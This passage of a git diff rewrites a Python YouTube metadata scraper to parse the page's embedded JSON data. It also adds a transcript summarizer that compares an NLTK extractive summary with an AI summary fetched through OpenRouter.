-    # channel_url = soup.find("span", itemprop="author").next['href']
-    channel_url = f"https://www.youtube.com/{channel_tag}"
-    # number of subscribers as str
-    channel_subscribers = videoSecondaryInfoRenderer['owner']['videoOwnerRenderer']['subscriberCountText']['accessibility']['accessibilityData']['label']
-    # channel details (old way)
-    # channel_tag = soup.find("yt-formatted-string", {"class": "ytd-channel-name"}).find("a")
-    # # channel name (old way)
-    # channel_name = channel_tag.text
-    # # channel URL (old way)
-    # channel_url = f"https://www.youtube.com{channel_tag['href']}"
-    # number of subscribers as str (old way)
-    # channel_subscribers = soup.find("yt-formatted-string", {"id": "owner-sub-count"}).text.strip()
-    result['channel'] = {'name': channel_name, 'url': channel_url, 'subscribers': channel_subscribers}
-    return result
+    """Scrape metadata for a YouTube watch page without running JavaScript.
+
+    The page HTML is downloaded with requests and the embedded
+    ``ytInitialData`` JSON blob is parsed for the video details.
+
+    Args:
+        url: URL of the YouTube video page.
+
+    Returns:
+        dict with "description", "duration", "tags", "likes" and "dislikes"
+        always set, plus "title", "views", "date_published" and "channel"
+        when the corresponding renderer is present in the page data.
+
+    Raises:
+        Exception: on any download or parsing failure; the underlying
+            error is chained as the cause.
+    """
+    headers = {
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
+    }
+    
+    try:
+        # Download HTML code; the timeout keeps a stalled connection from
+        # blocking forever (requests applies no timeout by default)
+        response = requests.get(url, headers=headers, timeout=30)
+        response.raise_for_status()
+        
+        # Initialize the result
+        result = {}
+        
+        # Extract ytInitialData which contains all the video information
+        data_match = re.search(r'var ytInitialData = ({.*?});', response.text)
+        if not data_match:
+            raise Exception("Could not find ytInitialData in page")
+            
+        data_json = json.loads(data_match.group(1))
+        
+        # Get the main content sections
+        contents = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents']
+        
+        # Locate the two info renderers by key instead of by fixed position,
+        # so a short or reordered list cannot raise IndexError
+        primary = next(
+            (c['videoPrimaryInfoRenderer'] for c in contents if 'videoPrimaryInfoRenderer' in c),
+            None,
+        )
+        secondary = next(
+            (c['videoSecondaryInfoRenderer'] for c in contents if 'videoSecondaryInfoRenderer' in c),
+            None,
+        )
+        
+        # Extract video information from videoPrimaryInfoRenderer
+        if primary is not None:
+            # Video title
+            result["title"] = primary['title']['runs'][0]['text']
+            # Video views
+            result["views"] = primary['viewCount']['videoViewCountRenderer']['viewCount']['simpleText']
+            # Date published
+            result["date_published"] = primary['dateText']['simpleText']
+        
+        # Extract channel information from videoSecondaryInfoRenderer
+        if secondary is not None:
+            owner = secondary['owner']['videoOwnerRenderer']
+            # Channel ID, used to build the /channel/ URL
+            channel_id = owner['navigationEndpoint']['browseEndpoint']['browseId']
+            result['channel'] = {
+                'name': owner['title']['runs'][0]['text'],
+                'url': f"https://www.youtube.com/channel/{channel_id}",
+                # Number of subscribers, taken from the accessibility label
+                'subscribers': owner['subscriberCountText']['accessibility']['accessibilityData']['label']
+            }
+        
+        # Extract video description
+        if secondary and 'attributedDescription' in secondary:
+            result["description"] = secondary['attributedDescription']['content']
+        else:
+            result["description"] = "Description not available"
+        
+        # Duration comes from the "approxDurationMs" value embedded in the page
+        duration_match = re.search(r'"approxDurationMs":"(\d+)"', response.text)
+        if duration_match:
+            duration_ms = int(duration_match.group(1))
+            minutes = duration_ms // 60000
+            seconds = (duration_ms % 60000) // 1000
+            result["duration"] = f"{minutes}:{seconds:02d}"
+        else:
+            result["duration"] = "Duration not available"
+        
+        # Extract video tags if available
+        video_tags = data_json.get('metadata', {}).get('videoMetadataRenderer', {}).get('keywords', [])
+        result["tags"] = ', '.join(video_tags) if video_tags else "No tags available"
+        
+        # Likes default to "not available"; YouTube no longer shows dislikes
+        result["likes"] = "Likes count not available"
+        result["dislikes"] = "UNKNOWN"
+        
+        # Look for a like-button label in the composite renderer; every
+        # level is optional, so walk it with .get() instead of nested ifs
+        for content in contents:
+            label = (
+                content.get('compositeVideoPrimaryInfoRenderer', {})
+                .get('likeButton', {})
+                .get('toggleButtonRenderer', {})
+                .get('defaultText', {})
+                .get('accessibility', {})
+                .get('accessibilityData', {})
+                .get('label', '')
+            )
+            if 'like' in label.lower():
+                result["likes"] = label
+        
+        return result
+    except Exception as e:
+        raise Exception(f"Error extracting video info: {str(e)}") from e
 
 if __name__ == "__main__":
-    import argparse
     parser = argparse.ArgumentParser(description="YouTube Video Data Extractor")
     parser.add_argument("url", help="URL of the YouTube video")
 
     args = parser.parse_args()
+    
     # parse the video URL from command line
     url = args.url
     
-    data = get_video_info(url)
+    try:
+        data = get_video_info(url)
 
-    # print in nice format
-    print(f"Title: {data['title']}")
-    print(f"Views: {data['views']}")
-    print(f"Published at: {data['date_published']}")
-    print(f"Video Duration: {data['duration']}")
-    print(f"Video tags: {data['tags']}")
-    print(f"Likes: {data['likes']}")
-    print(f"Dislikes: {data['dislikes']}")
-    print(f"\nDescription: {data['description']}\n")
-    print(f"\nChannel Name: {data['channel']['name']}")
-    print(f"Channel URL: {data['channel']['url']}")
-    print(f"Channel Subscribers: {data['channel']['subscribers']}")
+        # print in nice format
+        print(f"Title: {data['title']}")
+        print(f"Views: {data['views']}")
+        print(f"Published at: {data['date_published']}")
+        print(f"Video Duration: {data['duration']}")
+        print(f"Video tags: {data['tags']}")
+        print(f"Likes: {data['likes']}")
+        print(f"Dislikes: {data['dislikes']}")
+        print(f"\nDescription: {data['description']}\n")
+        print(f"\nChannel Name: {data['channel']['name']}")
+        print(f"Channel URL: {data['channel']['url']}")
+        print(f"Channel Subscribers: {data['channel']['subscribers']}")
+        
+    except Exception as e:
+        print(f"Error: {e}")
+        print("\nNote: YouTube frequently changes its structure, so this script may need updates.")
\ No newline at end of file
diff --git a/web-scraping/youtube-transcript-summarizer/README.md b/web-scraping/youtube-transcript-summarizer/README.md
new file mode 100644
index 00000000..a3df25a0
--- /dev/null
+++ b/web-scraping/youtube-transcript-summarizer/README.md
@@ -0,0 +1 @@
+# [YouTube Video Transcription Summarization with Python](https://thepythoncode.com/article/youtube-video-transcription-and-summarization-with-python)
\ No newline at end of file
diff --git a/web-scraping/youtube-transcript-summarizer/requirements.txt b/web-scraping/youtube-transcript-summarizer/requirements.txt
new file mode 100644
index 00000000..865ee3b5
--- /dev/null
+++ b/web-scraping/youtube-transcript-summarizer/requirements.txt
@@ -0,0 +1,5 @@
+nltk
+pytube
+youtube_transcript_api
+colorama
+openai
diff --git a/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py b/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
new file mode 100644
index 00000000..bdb80f54
--- /dev/null
+++ b/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
@@ -0,0 +1,319 @@
+import os
+import sys
+import nltk
+import pytube
+from youtube_transcript_api import YouTubeTranscriptApi
+from nltk.corpus import stopwords
+from nltk.tokenize import sent_tokenize, word_tokenize
+from nltk.probability import FreqDist
+from heapq import nlargest
+from urllib.parse import urlparse, parse_qs
+import textwrap
+from colorama import Fore, Back, Style, init
+from openai import OpenAI
+
+# Initialize colorama for cross-platform colored terminal output
+init(autoreset=True)
+
+# Download necessary NLTK data
+nltk.download('punkt_tab', quiet=True)
+nltk.download('punkt', quiet=True)
+nltk.download('stopwords', quiet=True)
+
+# Initialize OpenAI client from environment variable
+# Expect the OpenRouter API key to be provided via OPENROUTER_API_KEY
+api_key = os.getenv("OPENROUTER_API_KEY")
+if not api_key or api_key.strip() == "<api_key>":  # unset, empty, or placeholder left in place
+    print(Fore.RED + "Error: OPENROUTER_API_KEY environment variable is not set or is still the placeholder ('<api_key>').")
+    sys.exit(1)
+else:
+    client = OpenAI(
+        base_url="https://openrouter.ai/api/v1",
+        api_key=api_key,
+    )
+
+def extract_video_id(youtube_url):
+    """Return the video ID from a YouTube URL, or raise ValueError if none is found."""
+    parsed_url = urlparse(youtube_url)
+    host = parsed_url.netloc.lower()
+    parts = parsed_url.path.split('/')  # "/embed/ID" -> ['', 'embed', 'ID']
+    video_id = ''
+    if host == 'youtu.be':
+        video_id = parts[1] if len(parts) > 1 else ''
+    elif host in ('www.youtube.com', 'youtube.com', 'm.youtube.com'):
+        if parsed_url.path == '/watch':
+            # .get() keeps a missing "v" parameter from surfacing as a bare KeyError
+            video_id = parse_qs(parsed_url.query).get('v', [''])[0]
+        elif len(parts) > 2 and parts[1] in ('embed', 'v', 'shorts', 'live'):
+            video_id = parts[2]
+    if not video_id:
+        raise ValueError(f"Could not extract video ID from URL: {youtube_url}")
+    return video_id
+
+def get_transcript(video_id):
+    """Fetch a video's transcript as one string, or an "Error ..." message on failure."""
+    try:
+        snippets = YouTubeTranscriptApi().fetch(video_id).snippets
+        # Join the caption snippets into a single space-separated text
+        joined = " ".join([snippet.text for snippet in snippets])
+        return joined.strip()
+    except Exception as e:
+        return f"Error retrieving transcript: {str(e)}."
+
+def summarize_text_nltk(text, num_sentences=5):
+    """Build an extractive summary by keeping the highest-scoring sentences.
+
+    Each sentence is scored by summing the text-wide frequencies of its
+    non-stopword, alphanumeric tokens; the top *num_sentences* sentences are
+    returned in their original order.
+
+    Args:
+        text: transcript text, or an "Error..."/"Transcript not available..."
+            message, which is passed through unchanged (as is empty text).
+        num_sentences: maximum number of sentences to keep (default 5).
+
+    Returns:
+        The summary string, or *text* itself when it has no more than
+        *num_sentences* sentences.
+    """
+    if not text or text.startswith(("Error", "Transcript not available")):
+        return text
+    sentences = sent_tokenize(text)
+    if len(sentences) <= num_sentences:
+        return text  # nothing to condense
+
+    # Frequency table over lowercase alphanumeric tokens, stopwords excluded
+    stop_words = set(stopwords.words('english'))
+    tokens = word_tokenize(text.lower())
+    freq = FreqDist([tok for tok in tokens if tok.isalnum() and tok not in stop_words])
+
+    # A sentence gets a score only if it contains at least one counted token
+    sentence_scores = {}
+    for index, sentence in enumerate(sentences):
+        score = sum(freq[tok] for tok in word_tokenize(sentence.lower()) if tok in freq)
+        if score:
+            sentence_scores[index] = score
+
+    # Pick the best-scoring sentence indices, then restore document order
+    top_indices = sorted(nlargest(num_sentences, sentence_scores, key=sentence_scores.get))
+    return ' '.join([sentences[index] for index in top_indices])
+
+def summarize_text_ai(text, video_title, num_sentences=5):
+    """Summarize *text* with the Mistral model served through OpenRouter.
+
+    Args:
+        text: transcript to summarize; empty text and "Error..."/"Transcript
+            not available..." messages are returned unchanged.
+        video_title: title included in the prompt for context.
+        num_sentences: approximate summary length requested from the model.
+
+    Returns:
+        The model's reply text, or an "Error generating AI summary: ..."
+        string if the API call raises.
+    """
+    if not text or text.startswith(("Error", "Transcript not available")):
+        return text
+
+    # Cap the transcript length; slicing is a no-op for shorter texts
+    max_chars = 15000  # Adjust based on model's context window
+    truncated_text = text[:max_chars]
+    prompt = f"""Please provide a concise summary of the following YouTube video transcript.
+Title: {video_title}
+
+Transcript:
+{truncated_text}
+
+Create a clear, informative summary that captures the main points and key insights from the video.
+Your summary should be approximately {num_sentences} sentences long.
+"""
+    user_message = {"role": "user", "content": [{"type": "text", "text": prompt}]}
+    try:
+        completion = client.chat.completions.create(
+            model="mistralai/mistral-small-3.1-24b-instruct:free",
+            messages=[user_message],
+        )
+        return completion.choices[0].message.content
+    except Exception as e:
+        return f"Error generating AI summary: {str(e)}"
+
+def summarize_youtube_video(youtube_url, num_sentences=5):
+    """Summarize a YouTube video's transcript with both the AI and NLTK methods.
+
+    Returns a dict with the title, video ID, both summaries and word counts,
+    or {"error": message} when the URL, transcript or summarization fails.
+    """
+    try:
+        video_id = extract_video_id(youtube_url)
+        transcript = get_transcript(video_id)
+        # get_transcript reports failure as a message, not an exception;
+        # surface it as an error instead of "summarizing" the message.
+        if not transcript or transcript.startswith("Error retrieving transcript:"):
+            return {"error": transcript or "Transcript is empty."}
+        # The title is only context for the AI prompt; fall back if pytube fails
+        try:
+            video_title = pytube.YouTube(youtube_url).title
+        except Exception:
+            video_title = "Unknown Title"
+        print(Fore.YELLOW + f"Generating AI summary with {num_sentences} sentences...")
+        ai_summary = summarize_text_ai(transcript, video_title, num_sentences) or ""
+        print(Fore.YELLOW + f"Generating NLTK summary with {num_sentences} sentences...")
+        nltk_summary = summarize_text_nltk(transcript, num_sentences)
+        return {
+            "video_title": video_title,
+            "video_id": video_id,
+            "ai_summary": ai_summary,
+            "nltk_summary": nltk_summary,
+            "full_transcript_length": len(transcript.split()),
+            "nltk_summary_length": len(nltk_summary.split()),
+            "ai_summary_length": len(ai_summary.split()) if not ai_summary.startswith("Error") else 0
+        }
+    except Exception as e:
+        return {"error": str(e)}
+
+def format_time(seconds):
+    """Render a duration given in seconds as "Xh Ym Zs"."""
+    hours, remainder = divmod(seconds, 3600)
+    minutes, secs = divmod(remainder, 60)
+    # Guard clauses from the largest unit down: hours and minutes are
+    # left out while they are zero-valued leading units.
+    if hours > 0:
+        return f"{hours}h {minutes}m {secs}s"
+    if minutes > 0:
+        return f"{minutes}m {secs}s"
+    return f"{secs}s"
+
+def format_number(number):
+    """Return *number* rendered with comma thousands separators."""
+    return f"{number:,}"
+
+def print_boxed_text(text, width=80, title=None, color=Fore.WHITE):
+    """Print *text* word-wrapped inside a box exactly *width* columns wide.
+
+    Args:
+        text: content to wrap and print.
+        width: total box width in columns, borders included.
+        title: optional caption centred in the top border.
+        color: colorama prefix applied to every printed line.
+    """
+    inner = width - 2  # columns between the two vertical borders
+    lines = textwrap.fill(text, width=width - 4).split('\n')
+
+    # Top border: centre the title (if any) in a run of rule characters
+    print(color + '┌' + (title or '').center(inner, '─') + '┐')
+
+    # Content rows: one leading space, then pad to inner - 1 so the right
+    # border sits in the same column as the corners above and below
+    for line in lines:
+        print(color + '│ ' + line.ljust(inner - 1) + '│')
+
+    # Bottom border
+    print(color + '└' + '─' * inner + '┘')
+
+def print_summary_result(result, width=80):
+    """Pretty-print the dict returned by summarize_youtube_video().
+
+    Args:
+        result: either {"error": message} or the summary dict holding the
+            title, video ID, both summaries and their word counts.
+        width: terminal width in columns used for rules and wrapping.
+    """
+    if "error" in result:
+        print_boxed_text(f"Error: {result['error']}", width=width, title="ERROR", color=Fore.RED)
+        return
+    
+    terminal_width = width
+    total_words = result['full_transcript_length']
+    # Print header with video information
+    print("\n" + Fore.CYAN + "=" * terminal_width)
+    print(Fore.CYAN + Style.BRIGHT + result['video_title'].center(terminal_width))
+    print(Fore.CYAN + "=" * terminal_width + "\n")
+    
+    # Video metadata section
+    print(Fore.YELLOW + Style.BRIGHT + "VIDEO INFORMATION".center(terminal_width))
+    print(Fore.YELLOW + "─" * terminal_width)
+    # Video ID left-aligned in roughly half the width, then the short URL
+    col_width = terminal_width // 2 - 2
+    print(f"{Fore.GREEN}Video ID: {Fore.WHITE}{result['video_id']:<{col_width}}"
+          f"{Fore.GREEN}URL: {Fore.WHITE}https://youtu.be/{result['video_id']}")
+    print(Fore.YELLOW + "─" * terminal_width + "\n")
+    
+    # AI Summary section; the ratio is "N/A" without a usable summary or transcript
+    ai_compression = "N/A"
+    if result['ai_summary_length'] > 0 and total_words > 0:
+        ai_compression = round((1 - result['ai_summary_length'] / total_words) * 100)
+    ai_summary_title = f" AI SUMMARY ({result['ai_summary_length']} words, condensed {ai_compression}% from {total_words} words) "
+    print(Fore.GREEN + Style.BRIGHT + ai_summary_title.center(terminal_width))
+    print(Fore.GREEN + "─" * terminal_width)
+    
+    # Print the AI summary with proper wrapping
+    wrapper = textwrap.TextWrapper(width=terminal_width-4, 
+                                  initial_indent='  ', 
+                                  subsequent_indent='  ')
+    
+    # Split AI summary into paragraphs and print each
+    ai_paragraphs = result['ai_summary'].split('\n')
+    for paragraph in ai_paragraphs:
+        if paragraph.strip():  # Skip empty paragraphs
+            print(wrapper.fill(paragraph))
+            print()  # Empty line between paragraphs
+    
+    print(Fore.GREEN + "─" * terminal_width + "\n")
+    
+    # NLTK Summary section; an empty transcript must not divide by zero
+    nltk_compression = "N/A"
+    if total_words > 0:
+        nltk_compression = round((1 - result['nltk_summary_length'] / total_words) * 100)
+    nltk_summary_title = f" NLTK SUMMARY ({result['nltk_summary_length']} words, condensed {nltk_compression}% from {total_words} words) "
+    print(Fore.MAGENTA + Style.BRIGHT + nltk_summary_title.center(terminal_width))
+    print(Fore.MAGENTA + "─" * terminal_width)
+    
+    # Regroup the NLTK summary's sentences into paragraphs of about 150 characters
+    paragraphs = result['nltk_summary'].split('. ')
+    formatted_paragraphs = []
+    current_paragraph = ""
+    for sentence in paragraphs:
+        # split('. ') removed the period; restore it unless the piece
+        # already ends with sentence punctuation (avoids "?." and "!.")
+        if not sentence.endswith(('.', '!', '?')):
+            sentence += '.'
+        if len(current_paragraph) + len(sentence) + 1 <= 150:  # Arbitrary length for paragraph
+            current_paragraph += " " + sentence if current_paragraph else sentence
+        else:
+            if current_paragraph:
+                formatted_paragraphs.append(current_paragraph)
+            current_paragraph = sentence
+    
+    if current_paragraph:
+        formatted_paragraphs.append(current_paragraph)
+    
+    # Print each paragraph
+    for paragraph in formatted_paragraphs:
+        print(wrapper.fill(paragraph))
+        print()  # Empty line between paragraphs
+    
+    print(Fore.MAGENTA + "─" * terminal_width + "\n")
+
+
+if __name__ == "__main__":
+    # Size the report to the terminal, clamped to a readable 80-120 columns
+    try:
+        terminal_width = max(80, min(os.get_terminal_size().columns, 120))
+    except (OSError, ValueError):
+        terminal_width = 80  # Default if can't determine (e.g. output is piped)
+    
+    # Print welcome banner
+    print(Fore.CYAN + Style.BRIGHT + "\n" + "=" * terminal_width)
+    print(Fore.CYAN + Style.BRIGHT + "YOUTUBE VIDEO SUMMARIZER".center(terminal_width))
+    print(Fore.CYAN + Style.BRIGHT + "=" * terminal_width + "\n")
+    
+    youtube_url = input(Fore.GREEN + "Enter YouTube video URL: " + Fore.WHITE).strip()
+    num_sentences_input = input(Fore.GREEN + "Enter number of sentences for summaries (default 5): " + Fore.WHITE)
+    try:
+        num_sentences = int(num_sentences_input) if num_sentences_input.strip() else 5
+    except ValueError:
+        # A non-numeric answer falls back to the default instead of crashing
+        print(Fore.RED + "Invalid number entered; using the default of 5 sentences.")
+        num_sentences = 5
+    print(Fore.YELLOW + "\nFetching and analyzing video transcript... Please wait...\n")
+    result = summarize_youtube_video(youtube_url, num_sentences)
+    print_summary_result(result, width=terminal_width)